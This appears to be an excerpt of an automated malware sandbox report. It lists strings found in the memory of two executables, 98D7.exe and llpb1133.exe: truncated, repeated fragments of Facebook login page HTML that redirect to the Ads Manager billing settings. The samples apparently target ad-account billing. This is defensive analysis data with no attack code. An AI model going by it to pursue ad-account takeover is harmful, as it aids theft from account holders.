Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://hi-in.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_US&quot;, &quot;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Hindi"> equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;zh_CN&quot;, &quot;en_US&quot;, &quot;https:\/\/zh-cn.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)"> equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="0UjEcK6d">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr6oI","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-U40","isCQuick":false});</script><script nonce="0UjEcK6d">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="0UjEcK6d"></style><script nonce="0UjEcK6d">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604851431.0000000002865000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="0UjEcK6d">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr6oI","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-U40","isCQuick":false});</script><script nonce="0UjEcK6d">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="0UjEcK6d"></style><script nonce="0UjEcK6d">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Pud6B2Z" /> equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2FaK equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2FaK equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="h_0_0_DM",{"__html":"Bahasa Indonesia"},1],["__markup_3310c079_0_1_eM",{"__html":"Dansk"},1],["__markup_3310c079_0_2_2L",{"__html":"Deutsch"},1],["__markup_3310c079_0_3_ft",{"__html":"English (UK)"},1],["__markup_3310c079_0_4_y0",{"__html":"English (US)"},1],["__markup_3310c079_0_5_l6",{"__html":"Espa\u00f1ol"},1],["__markup_3310c079_0_6_tR",{"__html":"Espa\u00f1ol (Espa\u00f1a)"},1],["__markup_3310c079_0_7_Y1",{"__html":"Fran\u00e7ais (France)"},1],["__markup_3310c079_0_8_5+",{"__html":"Italiano"},1],["__markup_3310c079_0_9_eb",{"__html":"Magyar"},1],["__markup_3310c079_0_a_5j",{"__ht equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rs equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsoJ equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Pud6B2Z" /> equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2FaB862DED} equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2FaB862DED}tqX5tk11V/C3f@ equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605696603.0000000002916000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</titl equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https:/ equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content=" equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="f5jFR5CM">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr4xk","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-WnQ","isCQuick":false});</script><script nonce="f5jFR5CM">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="f5jFR5CM"></style><script nonce="f5jFR5CM">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content=" equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tcnyEH4i">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tcnyEH4i">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tcnyEH4i">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/0,cross/XznY7q1olI3.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="TGesA0a" /> equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tcnyEH4i">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=httpsh equals www.facebook.com (Facebook)
